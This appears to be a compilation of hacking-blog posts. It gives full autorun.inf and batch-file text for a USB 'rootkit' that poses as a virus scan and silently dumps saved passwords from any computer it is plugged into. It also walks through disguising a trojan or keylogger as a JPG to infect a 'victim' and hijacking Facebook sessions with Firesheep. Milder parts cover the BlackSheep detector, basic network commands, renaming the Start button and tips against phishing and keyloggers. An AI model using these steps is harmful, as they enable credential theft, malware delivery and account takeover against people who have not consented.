How to Sniff Passwords Using USB Drive

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.

 MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedre to create the password hacking toolkit.

NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.

ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt 

save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

NOTE: This procedure will only recover the stored passwords (if any) on the Computer. and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP and Vista

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

BlackSheep – Detect Users Of FireSheep On The Network

As you surely know, things blew up recently at Toorcon 12 with the release of the much talked about Firefox plugin called Firesheep.

There were various discussions about how to mitigate against it like using Firefox plug-ins to force SSL connections (where available). Microsoft also tried to secure Hotmail with SSL but kinda b0rked that too.

For the 1 person in the World left that doesn’t know, Firesheep allowed any user to seamlessly hijack the web session of another user on the same local network. Although such attacks are not new, the ease of use presented by Firesheep brought session hijacking to the masses.

BlackSheep, also a Firefox plugin is designed to combat Firesheep. BlackSheep does this by dropping ‘fake’ session ID information on the wire and then monitors traffic to see if it has been hijacked. While Firesheep is largely passive, once it identifies session information for a targeted domain, it then makes a subsequent request to that same domain, using the hijacked session information in order to obtain the name of the hijacked user along with an image of the person, if available. It is this request that BlackSheep identifies in order to detect the presence of Firesheep on the network. When identified, the user will be receive the following warning message:

t should be noted that Firesheep and BlackSheep cannot be installed on the same Firefox instance as they share much of the same code base. If you want to run both Firesheep and BlackSheep on the same machine, they should be installed in separate Firefox profiles.

Requirements

In order to install BlackSheep, you need:

  • Mac OS X: 10.5 or newer on an Intel processor.
  • Windows: XP or newer. Install Winpcap first!
  • Firefox: 3.5 or newer. 32-bit only.
  • Linux : details here

You can download BlackSheep here:

blacksheep-latest.xpi

Network Hacking

Network Hacking is generally means gathering information about domain by using tools like Telnet, NslookUp, Ping, Tracert, Netstat, etc.
It also includes OS Fingerprinting, Port Scaning and Port Surfing using various tools.

Ping :- Ping is part of ICMP (Internet Control Message Protocol) which is used to troubleshoot TCP/IP networks. So, Ping is basically a command that allows you to check whether the host is alive or not.
To ping a particular host the syntax is (at command prompt)–

c:/>ping hostname.com

example:- c:/>ping http://www.google.comVarious attributes used with ‘Ping’ command and their usage can be viewed by just typing c:/>ping at the command prompt.

Netstat :- It displays protocol statistics and current TCP/IP network connections. i.e. local address, remote address, port number, etc.
It’s syntax is (at command prompt)–

c:/>netstat -n

IP address is also being given, But I am hiding my IP here for security purpose.

Telnet :- Telnet is a program which runs on TCP/IP. Using it we can connect to the remote computer on particular port. When connected it grabs the daemon running on that port.
The basic syntax of Telnet is (at command prompt)–

c:/>telnet hostname.com

By default telnet connects to port 23 of remote computer.
So, the complete syntax is-

c:/>telnet http://www.hostname.com port
Tracert :- It is used to trace out the route taken by the certain information i.e. data packets from source to destination.
It’s syntax is (at command prompt)–

example:- c:/>tracert http://www.insecure.inHere “*    *    *    Request timed out.” indicates that firewall installed on that system block the request and hence we can’t obtain it’s IP address.

various attributes used with tracert command and their usage can be viewed by just typing c:/>tracert at the command prompt.

The information obtained by using tracert command can be further used to find out exact operating system running on target system.

example:- c:/>telnet http://www.yahoo.com 21 or c:/>telnet 192.168.0.5 21

Hide EXE File into JPG

This is a good trick to hide your exe files into a jpg file..!

How about sending a trojan or a keylogger into your victim using this trick..??

1) Firstly, create a new folder and make sure that the options ‘show hidden files and folders’ is checked and ‘hide extensions for known file types’ is unchecked.
Basically what you need is to see hidden files and see the extension of all your files on your pc.

2) Paste a copy of your server on the new created folder. let’s say it’s called ‘server.exe’ (that’s why you need the extension of files showing, cause you need to see it to change it)

3) Now you’re going to rename this ‘server.exe’ to whatever you want, let’s say for example ‘picture.jpeg’

4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5) Now create a shortcut of this ‘picture.jpeg’ in the same folder.

6) Now that you have a shortcut, rename it to whatever you want, for example, ‘me.jpeg’.

7) Go to properties (on file me.jpeg) and now you need to do some changes there.

8) First of all delete all the text on field ‘Start In’ and leave it empty.

9) Then on field ‘Target’ you need to write the path to open the other file (the server renamed ‘picture.jpeg’) so you have to write this :-
‘C:\WINDOWS\system32\cmd.exe /c picture.jpeg’

10) The last field, ‘c picture.jpeg’ is always the name of the first file. If you called the first file ‘soccer.avi’ you gotta write ‘C:\WINDOWS\system32\cmd.exe /c soccer.avi’.

11) So what you’re doing is when someone clicks on ‘me.jpeg’, a cmd will execute the other file ‘picture.jpeg’ and the server will run.

12) On that file ‘me.jpeg’ (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-
%SystemRoot%\system32\SHELL32.dll . Then press OK.

13) You can set the properties ‘Hidden’ for the first file ‘picture.jpeg’ if you think it’s better to get a connection from someone.

14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to ‘picture2.jpeg’ and the shortcut to ‘picture1.jpeg’.
This way the shortcut will show up first. If you set hidden properties to the server ‘picture.jpeg’ then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.

16) So the best way to send these files together to someone is compress them into Zip or Rar.

17) inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.

Rename A Start Button – Windows xp

To rename the start button, you will just need to do is download Resource hacker.

Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Win95, Win98, WinME, WinNT, Win2000 and WinXP operating systems.

To Download Click here

First Step : The first step is to make a backup copy of the file explorer.exe located at C:\Windows\explorer. Place it in a folder somewhere on your hard drive where it will be safe. Start Resource Hacker and open explorer.exe located at C:\Windows\explorer.exe
The category we are going to be using is String Table In Resource Hacker. Expand it by clicking the plus sign then navigate down to and expand string 37 followed by highlighting 1033. If you are using the Classic Layout rather than the XP Layout, use number 38. The right hand pane will display the stringtable as shown in Fig. We’re going to modify item 578, currently showing the word “start” just as it displays on the current Start button.

There is no magic here. Just double click on the word “start” so that it’s highlighted, making sure the quotation marks are not part of the highlight. They need to remain in place, surrounding the new text that you’ll type. Go ahead and type your new entry.

Compile and save (actually save as) with another name like expmann.exe

Second Step: Modify the Registry Now that the modified expmann.exe has been created it’s necessary to modify the registry so the file will be recognized when the user logs on to the system. If you don’t know how to access the registry I’m not sure this article is for you, but just in case it’s a temporary memory lapse, go to Start (soon to be something else) Run and type regedit in the Open: field. Navigate to:
HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon

the Right pane, double click the Shell entry to open the Edit String dialog box as shown in Fig.  In Value data: line, enter the name that was used to save the modified expmann.exe file. Click OK.

Close Registry Editor and reboot the entire system. If all went as planned you should see your new Start button with the revised text.

Firesheep Makes Facebook Hacking Easy

Recently a new firefox addon Firesheep have been a cause of thousands of email accounts, As reported by techcurnch,  Firesheep has been downloaded more than 104,000 times in roughly last 24 hours, With Firesheep the hacker can control  any account without even knowing the username and password of the desired account, As Facebook is worlds most popular Social Networking website, therefore it has been the major victim of it, Firesheep uses Http Session hijacking attack to gain unauthorized access to a Facebook or any other account.

What is Session Hijacking?

In a Http session hijacking attack an attacker steals victims cookies, Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Facebook Google, Yahoo, Orkut, Flickr etc or any other email account.

How can a Hacker use Firesheep to Hack a Facebook or any other account?

Now I will tell you how can a hacker use firesheep to hack a facebook or any other account, You will need the following things:

Method

1. First of all download “Firesheep” from the above link and use the “openwith” option in the firefox browser.

2. Once you have installed firesheep on firefox web browser, Click on view at the top, then goto sidebar and click on Firesheep.

3. Now click on the top left button “Start capturing” and it will start to capture the session cookies of people in your wifi network, This will show you the list of those people whose cookies are captured and have visited unsecured website known to firesheep, Double click on the photo and you will be logged in instantly.

Prevent ur Account from Hackers

Here I will be discussing how u can protect ur account’s from Hackers or for the right word Crackers.

1. Beware of Phishing :-

Phishing is one of the most widely used and simplest ways of gaining access to one’s account thru hacking.Phishers are pages which are uploaded into hosting sites and then given away to victims….

In appearance the phisher looks exactly as ur common login page.

For eg :-taking into consideration an orkut account and u received a link by someone asking u to click on that link.

Now when u click on that link , it takes u to a new page that looks like ur orkut account login page.

Don’t be fooled by that , now most of the people will without a second thought enter their username and passcode and press enter.But u will not be logged into ur account.It is a phisher , ur login info will be sent to the person who sent u the link.

So no matter who and however trusty that person is do not login on any other page except.

Or else ur account might be on the verge of getting hacked……

PHISHING DONE IN ANOTHER WAY

MANY TIMES .. PHISHERS WILL SEND U A MAIL IN UR EMAIL ID .. WITH THE ID — GMAILPASSWORDRECOVERE .. ET ETC .. AND TELLING U TO VERIFY UR ACCOUNT OR ELSE UR ACCOUNT WILL BE DELETED .

DON’T EVER LOGIN AT ANY PAGE OTHER THAN THE ORIGINAL WEBSITE

2. Keep a strong password :-

Always have a passcode with many characters , minimum 6 characters having a combination of small and big letters and number and special characters like “$”.Then there are very minimal chances that ur passcode will be hacked…..

3. Keyloggers :-

Many times u make online friends that u do not know personally.Then after many chats the person tells u he created a game and wanted u to see it and give a review.U gladly accept it, the game might actually be a keylogger.Keyloggers have become very common nowadays.Now when u double click on the keylogger it gets activated.The next time u login into any page ur username and passocode will be sent to the other guy…..

So do not accept such things from people u do not trust very much…….

4. Keeping ur antivirus up-to-date :-

Many people believe that antiviruses do nothing and hence they do not install them , and think that if a virus infects their PC then they will format the PC.But this is wrong , whenever a virus enters ur PC then there is a very strong possibility that a bad sector is created in ur PC.Antiviruses thus protect ur PC….